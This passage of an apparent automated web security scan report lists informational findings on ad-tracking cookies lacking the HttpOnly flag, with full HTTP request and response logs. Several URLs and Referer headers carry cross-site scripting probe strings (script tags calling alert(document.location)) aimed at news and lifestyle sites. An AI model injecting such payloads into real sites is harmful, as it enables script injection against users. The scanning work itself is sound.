User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server

5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
5.41. http://p.raasnet.com/partners/dfp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';
5.42. http://p.raasnet.com/partners/oxmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

5.43. http://p.raasnet.com/partners/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close

5.44. http://p.raasnet.com/partners/universal/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...
5.45. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});
5.46. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS

5.47. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
